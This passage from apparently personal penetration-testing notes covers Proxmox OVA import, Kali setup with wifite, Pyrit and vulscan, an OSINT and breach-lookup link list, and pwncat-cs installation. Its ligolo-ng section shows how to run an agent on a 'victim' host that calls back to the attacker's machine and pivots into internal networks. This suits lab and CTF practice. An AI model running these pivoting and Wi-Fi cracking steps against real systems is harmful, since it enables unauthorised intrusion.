/images/dd7290ca93369cee33182023cb9190ff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/dd7290ca93369cee33182023cb9190ff.png -------------------------------------------------------------------------------- /images/dnsmasq.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/dnsmasq.gif -------------------------------------------------------------------------------- /images/ff706d6530426d3123c0983acd61f934.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/ff706d6530426d3123c0983acd61f934.png -------------------------------------------------------------------------------- /images/pwncat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/pwncat.gif -------------------------------------------------------------------------------- /images/ssti.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/ssti.png -------------------------------------------------------------------------------- /images/terminator_shortcuts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/terminator_shortcuts.png -------------------------------------------------------------------------------- /images/vpnchoice.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/vpnchoice.gif -------------------------------------------------------------------------------- /import_ova_to_pve.md: -------------------------------------------------------------------------------- 1 | # Import OVA to Proxmox 2 | 3 | 1. Extract OVA file in Proxmox Server 4 | 5 | ```bash 6 | tar xvf vmfile.ova 7 | ``` 8 | 9 | 2. Import VM Settings to Proxmox 10 | 11 | ``` 12 | qm importovf 605 ./vmfile.ovf local --format qcow2 13 | ``` 14 | 15 | 3. Remove existing disk from VM 16 | 17 | 4. Import VM Disk (VMDK) to Virtual Machine (VM) 18 | 19 | ``` 20 | qm importdisk 605 vmfile.vmdk local -format qcow2 21 | ``` 22 | 23 | 5. Add disk to VM (double click on it) 24 | 25 | 6. Add Virtual Network Interface 26 | 27 | 7. Add snapshot RESET 28 | -------------------------------------------------------------------------------- /install.md: -------------------------------------------------------------------------------- 1 | 2 | # KALI 3 | 4 | 1. Alias 5 | 6 | ```sh 7 | vi /root/.bash_aliases 8 | 9 | alias ll='ls --color=always -hla' 10 | 11 | function apt-updater { 12 | apt-get update && 13 | apt-get dist-upgrade -Vy && 14 | apt-get autoremove -y && 15 | apt-get autoclean && 16 | apt-get clean && 17 | searchsploit -u #&& 18 | #reboot 19 | } 20 | 21 | function newctf { 22 | _template="/home/kali/Hacks/READMECTF_TEMPLATE.md" 23 | _readme="README.md" 24 | if [[ $# == 1 && -f "${_template}" && ! -d "$1" ]] 25 | then 26 | mkdir $1 27 | cd $1 28 | cp "${_template}" "${_readme}" 29 | sed -i "s/ctfname/$1/" "${_readme}" 30 | subl "${_readme}" 31 | else 32 | if [[ $# != 1 ]] 33 | then 34 | echo "Wrong parameter" 35 | fi 36 | if [[ ! 
-f "${_template}" ]]
37 | then
38 | echo "${_template} does not exist"
39 | fi
40 | if [[ -d "$1" ]]
41 | then
42 | echo "$1 already exists"
43 | fi
44 | fi
45 | }
46 | ```
47 | 
48 | In `~/.vimrc`
49 | ```sh
50 | source $VIMRUNTIME/defaults.vim
51 | set mouse-=a
52 | ```
53 | 
54 | ```sh
55 | sudo ln -s /home/kali/Hacks/Divers/upload_file_nc.sh /usr/local/bin/upload_file_nc
56 | sudo ln -s /home/kali/Hacks/Divers/upload_file_wget.sh /usr/local/bin/upload_file_wget
57 | ```
58 | 
59 | 2. Terminal
60 | 
61 | ```sh
62 | apt install terminator
63 | ```
64 | 
65 | 3. Latest Version of Tor
66 | 
67 | ```sh
68 | echo 'deb https://deb.torproject.org/torproject.org stretch main
69 | deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list
70 | 
71 | wget -O- https://deb.torproject.org/torproject.org/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | sudo apt-key add -
72 | 
73 | apt-get update
74 | 
75 | apt-get install tor deb.torproject.org-keyring
76 | ```
77 | 
78 | 4. SublimeText
79 | 
80 | ```sh
81 | wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add -
82 | 
83 | sudo apt-get install apt-transport-https
84 | 
85 | echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list
86 | 
87 | sudo apt-get update
88 | 
89 | sudo apt-get install sublime-text
90 | ```
91 | 
92 | 5. Change SSH Keys & Default Password (the old host keys must be removed first, otherwise `dpkg-reconfigure` keeps them)
93 | 
94 | ```sh
95 | cd /etc/ssh/ && rm -f ssh_host_*
96 | dpkg-reconfigure openssh-server
97 | 
98 | passwd root
99 | ```
100 | 
101 | 6. Software
102 | 
103 | ```sh
104 | apt install gobuster
105 | 
106 | apt install seclists
107 | 
108 | apt install terminator
109 | 
110 | apt install steghide
111 | 
112 | sudo apt install python3-pip
113 | 
114 | pip3 install stegcracker
115 | ```
116 | 
117 | get rustscan: https://github.com/RustScan/RustScan/releases
118 | dpkg -i deb_file
119 | 
120 | ## Wifite
121 | ```sh
122 | sudo apt install hcxdumptool
123 | sudo apt install hcxtools
124 | ```
125 | 
126 | * Pyrit
127 | 
128 | ```sh
129 | sudo apt-get install libpcap-dev
130 | sudo apt-get install python2.7-dev libssl-dev zlib1g-dev libpcap-dev
131 | git clone https://github.com/JPaulMora/Pyrit.git
132 | cd Pyrit
133 | sudo python setup.py clean
134 | sudo python setup.py build
135 | sudo python setup.py install
136 | ```
137 | ```sh
138 | sudo wifite --wpa --dict file.txt --kill
139 | ```
140 | 
141 | ## VULSCAN
142 | 
143 | Install in /usr/share/nmap/scripts/vulscan or /usr/local/share/nmap/scripts/vulscan
144 | ```sh
145 | git clone https://github.com/scipag/vulscan
146 | nmap -sV --script=vulscan/vulscan.nse www.example.com
147 | wget https://www.computec.ch/projekte/vulscan/download/cve.csv
148 | wget https://www.computec.ch/projekte/vulscan/download/exploitdb.csv
149 | wget https://www.computec.ch/projekte/vulscan/download/openvas.csv
150 | wget https://www.computec.ch/projekte/vulscan/download/osvdb.csv
151 | wget https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv
152 | wget https://www.computec.ch/projekte/vulscan/download/securityfocus.csv
153 | wget https://www.computec.ch/projekte/vulscan/download/securitytracker.csv
154 | wget https://www.computec.ch/projekte/vulscan/download/xforce.csv
155 | ```
--------------------------------------------------------------------------------
/ligolo.md:
--------------------------------------------------------------------------------
1 | # LIGOLO
2 | 
3 | ## Pre-requisite
4 | 
5 | ```bash
6 | sudo apt install golang-go
7 | ```
8 | 
9 | ## Install
10 | 
11 | ```bash
12 | cd /opt 13 | sudo git clone https://github.com/nicocha30/ligolo-ng 14 | cd ligolo-ng 15 | sudo go build -o agent cmd/agent/main.go 16 | sudo go build -o proxy cmd/proxy/main.go 17 | ``` 18 | 19 | ## Creating a TUN Interface (kali) 20 | 21 | ```bash 22 | sudo ip tuntap add user kali mode tun ligolo 23 | sudo ip link set ligolo up 24 | ``` 25 | 26 | ## Starting the Proxy Server (kali) 27 | 28 | ```bash 29 | cd /opt/ligolo-ng 30 | ./proxy -selfcert 31 | ``` 32 | 33 | ## Agent (victim) 34 | 35 | https://github.com/nicocha30/ligolo-ng/releases 36 | 37 | ```bash 38 | ./agent -connect kali_ip:11601 -ignore-cert & 39 | ``` 40 | 41 | ## Adding a new route on Proxy Server (kali) 42 | 43 | ```bash 44 | sudo ip route add ip_to_reach_on_victim/24 dev ligolo 45 | ``` 46 | 47 | ## Start session (kali/proxy) 48 | 49 | - Type `session` 50 | - Select the session 51 | - Type `start` 52 | 53 | ## Double Pivot 54 | 55 | ### Creating a Listener (kali/proxy) 56 | 57 | In the session 58 | 59 | ```bash 60 | listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp 61 | listener_list 62 | ``` 63 | 64 | ### Connect Double Pivot box to Proxy Server (victim 2) 65 | 66 | ```bash 67 | ./agent.exe -connect 2nd_ip_of_victim_1:11601 -ignore-cert & 68 | ``` 69 | 70 | ### Adding a new route on Proxy Server (kali) 71 | 72 | ```bash 73 | sudo ip route add ip_to_reach_on_victim_2/24 dev ligolo 74 | ``` -------------------------------------------------------------------------------- /osint.txt: -------------------------------------------------------------------------------- 1 | https://whatsmyname.app/ 2 | https://namecheckup.com/ 3 | https://github.com/WebBreacher/WhatsMyName 4 | https://github.com/sherlock-project/sherlock 5 | https://scylla.sh/api 6 | https://www.dehashed.com/ -------------------------------------------------------------------------------- /pwncat-cs.md: -------------------------------------------------------------------------------- 1 | # Install pwncat-cs on Kali with python 
>= 3.12 2 | 3 | ```bash 4 | sudo apt update 5 | sudo apt install build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev curl git libncursesw5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev -y 6 | sudo apt install python3 python3-pip -y 7 | ``` 8 | 9 | ```bash 10 | curl https://pyenv.run | bash 11 | ``` 12 | 13 | ```bash 14 | cat <<'EOF' >> ~/.bashrc 15 | export PATH="${HOME}/.pyenv/bin:$PATH" 16 | eval "$(pyenv init -)" 17 | eval "$(pyenv virtualenv-init -)" 18 | EOF 19 | source ~/.bashrc 20 | ``` 21 | 22 | ```bash 23 | pyenv install 3.11.0 24 | ``` 25 | 26 | ```bash 27 | pyenv virtualenv 3.11.0 pwncat-cs 28 | ``` 29 | 30 | ```bash 31 | pyenv activate pwncat-cs 32 | ``` 33 | 34 | ```bash 35 | pip install pwncat-cs 36 | ``` --------------------------------------------------------------------------------